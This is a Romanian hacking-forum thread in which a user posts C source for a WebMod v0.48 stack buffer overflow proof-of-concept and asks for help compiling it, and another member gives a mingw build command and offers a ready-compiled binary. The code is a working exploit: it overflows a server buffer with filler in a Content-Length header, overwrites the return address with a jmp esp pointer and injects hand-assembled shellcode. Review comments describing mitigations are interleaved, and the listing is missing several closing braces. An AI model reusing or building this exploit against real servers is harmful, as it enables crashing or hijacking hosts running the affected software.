Hacking and more... / S.O.S. / Compilare-need help Moderat de Shocker
Membru nou

Inregistrat: acum 17 ani
Postari: 11
Ma ajuta cineva sa compilez , am incercat de multe ori dar primesc niste erori!
codul sursa:


 * WebMod Stack Buffer Overflow
 * WebMod v0.48 exploit PoC code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <windows.h>
#include <winsock.h>
#pragma comment (lib, "ws2_32.lib")

local variables in connectHandle():

char *input;            4
char buf[8192+1];        8193
int i,j;            8
int connfd;            4
int myid;            4
threaddata_t *tdata;        4
httpquery_t query;        149036
char tmp[1025];            1025
int rcv;            4
char clbuf[11];            11

total:                158293
actual (due to padding):    158308

  breakdown of types:
    typedef struct s_var {        546
      char name[33];          33
      char value[513];          513
    } var_s;

    typedef struct s_httpquery {    149036
      char method[11];          11
      char clientip[16];          16
      char url[257];          257
      char *get;              4
      char *post;              4
      char *cookies;          4
      var_s vars[256];          139776
      char currentmapname[257];      257
      char sendcookies[8192+1];      8193
      char contenttype[257];      257
      char location[257];          257
    } httpquery_t;

//contains data to fill the Content-Length field with
//20000-byte filler chunk. main() sets every byte to 'a' and sends the chunk
//repeatedly right after the "Content-Length: " text, so the header value is
//filler bytes rather than a decimal length. A server that parses
//Content-Length as a bounded integer and caps header-line length rejects
//such a request before any fixed-size buffer is written.
char spambuf[20000];

//code to inject
//this particular code only works on Win2K SP4 (v5.0.4.0)
//and kernel32.dll v5.0.2195.6688
//
//Per its own annotations below, the payload is demonstrative: it shows a
//message box with the text "HI!" and then ends the hosting process.
//NOTE(review): every API is reached through a hard-coded absolute address
//(77E38098h, 7C4EB8F4h, 7C518DC3h), which is why the author ties it to one
//exact OS/DLL build. Module-base randomisation (ASLR) invalidates such
//addresses, and a non-executable stack (DEP/NX) stops bytes delivered as
//request data from being run at all - both are relevant mitigations when
//assessing exposure of a host running the affected server.
unsigned char code[] = {
                    // ; push string onto the stack without using 0x00
    0xB8, 0x59, 0x5A, 0x32, 0x11,    //mov     eax, 11325A59h ; "HI!\0" + 11111111h
    0x2D, 0x11, 0x11, 0x11, 0x11,    //sub     eax, 11111111h
    0x50,                //push    eax
    0x8B, 0xC4,            //mov     eax, esp     ; eax points to string

    0x33, 0xC9,            //xor     ecx, ecx     ; zero

                    // ; call MessageBox
    0x51,                //push    ecx         ; flags (0)
    0x50,                //push    eax         ; caption
    0x50,                //push    eax         ; text
    0x51,                //push    ecx         ; hwnd (0)
    0xB8, 0x98, 0x80, 0xE3, 0x77,    //mov     eax, 77E38098h ; &MessageBox
    0xFF, 0xD0,            //call    eax

                    // ; call GetCurrentProcessId
    0xB8, 0xF4, 0xB8, 0x4E, 0x7C,    //mov     eax, 7C4EB8F4h ; &GetCurrentProcessId
    0xFF, 0xD0,            //call    eax

    0x33, 0xC9,            //xor     ecx, ecx     ; zero

                    // ; call TerminateProcess
    0x51,                //push    ecx         ; return code (0)
    0x50,                //push    eax         ; process id
    0xB8, 0xC3, 0x8D, 0x51, 0x7C,   //mov     eax, 7C518DC3h ; &TerminateProcess
    0xFF, 0xD0            //call    eax


//EIP you want to insert, this points to an "FF E4" (jmp esp) in w_mm.dll
//set this to 0xFFFFFFFF to just cause a crash
//main() sends these sizeof(our_eip) bytes directly after the filler.
//NOTE(review): the value is a fixed absolute address inside one module, so it
//is only meaningful while that module is loaded at the same base in the
//server process; stack canaries on the vulnerable function, or rebasing/ASLR
//of the module, defeat this kind of return-address overwrite.
unsigned int our_eip = 0x67E03C5B;

//Proof-of-concept driver for the WebMod v0.48 stack overflow named in the
//file header. It connects to <hostname|ip> (argv[1]) on the optional port
//(argv[2], default 27015) and sends a single POST request whose
//Content-Length header value is filler bytes, then our_eip, then code[],
//then "\n\n". Returns 1 on usage/socket/resolve/connect failure, 0 otherwise.
//
//What a defender sees on the wire: one request whose Content-Length header
//line is roughly 158 KB long, non-numeric, terminated with bare LF, and with
//"Host: localhost:27015" regardless of the real target (it is hard-coded in
//initbuf). Capping header-line length and requiring a decimal Content-Length
//is enough to reject it before any copy into a fixed-size buffer.
//
//NOTE(review): the listing is shown as posted; the forum rendering dropped
//the closing braces of the error branches and of main().
int main(int argc, char* argv[]) {
    WSADATA wsadata;
    int sock = 0;
    struct hostent* host = NULL;
    struct sockaddr_in saddr;

    //data to sent initially
    //(request line, fixed Host header, and the start of the Content-Length
    //header - the header value itself is streamed by the send() calls below)
    char initbuf[] = "POST / HTTP/1.1\nHost: localhost:27015\nContent-Length: ";

    //data to send after headers
    char endbuf[] = "\n\n";

    char* hostname = NULL;
    short hostport = 27015;

    int i;
    unsigned int sent = 0;

    //get host/port from command line
    if (argc < 2) {
        printf("Usage:\t%s <hostname|ip> [port=27015]\n", argv[0]);
        return 1;
    hostname = argv[1];
    if (argc >= 3) hostport = atoi(argv[2]);

    WSAStartup(MAKEWORD(1,1), &wsadata);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock <= 0) {
        printf("socket() error\n");
        return 1;

    host = gethostbyname(hostname);
    if (!host) {
        printf("gethostbyname() error\n");
        return 1;

    printf("Resolved \"%s\" to %s\n", hostname, inet_ntoa(*(struct in_addr*)host->h_addr_list[0]));

    memset(&saddr, 0, sizeof(struct sockaddr_in));
    saddr.sin_family = AF_INET;
    saddr.sin_port = htons(hostport);
    memcpy(&saddr.sin_addr.s_addr, host->h_addr_list[0], host->h_length);

    if (connect(sock, (struct sockaddr*)&saddr, sizeof(struct sockaddr)) < 0) {
        printf("connect() error\n");
        return 1;

    //initialize buffers
    memset(spambuf, 'a', sizeof(spambuf));

    //send initial POST request
    sent += send(sock, initbuf, sizeof(initbuf)-1, 0);

    //send 7 full spambufs to get 140000 bytes
    for (i = 0; i < 7; ++i)
        sent += send(sock, spambuf, sizeof(spambuf), 0);

    //send partial spambuf to fill remaining data
    //(18308, this goes right up to the EIP)
    //140000 + 18308 = 158308, the "actual (due to padding)" size of
    //connectHandle()'s locals given in the layout notes at the top of the
    //file. NOTE(review): the listing does not say which of those fixed-size
    //buffers receives the unbounded copy - confirm against the server source
    //when writing the fix.
    sent += send(sock, spambuf, 18308, 0);

    //fill EIP
    sent += send(sock, (char*)&our_eip, sizeof(our_eip), 0);

    //insert code!
    sent += send(sock, (char*)code, sizeof(code), 0);

    //send newlines after content-length
    sent += send(sock, endbuf, sizeof(endbuf)-1, 0);

    printf("%u bytes sent...waiting...\n", sent);

    //wait for a while so the socket isn't closed on our end
    //before they receive all the data

    return 0;

pus acum 17 ani
Little Kevin

Din: Timisoara
Inregistrat: acum 17 ani
Postari: 74
poate zici ce compilator ai incercat ... si ce erori ai ... sau "shall I use the force, Luke?"

NU pot decat sa presupun ca dadea o eroare ceva de genu: "missing reference ... WSAStartup" sau ceva de genu

uite aici dar cu mingw cross compiler ... daca tot nu-ti merge iti dau eu gata compilat ... uite solutia problemei :


xxs @ xskub:~/Desktop$ i586-mingw32msvc-gcc xs.c -lws2_32
xxs @ xskub:~/Desktop$ wine a.exe
Usage:  a.exe <hostname|ip> [port=27015]
xxs @ xskub:~/Desktop$

sper ca intelegi ... daca nu ... poate ca exploiturile nu sunt de tine

Modificat de SimionescuRadu (acum 17 ani)

pus acum 17 ani
Membru nou

Inregistrat: acum 17 ani
Postari: 11
si eu tot cu gcc am incercat insa ma prinsesem pe parcurs unde este eroarea :P
multam fain

pus acum 17 ani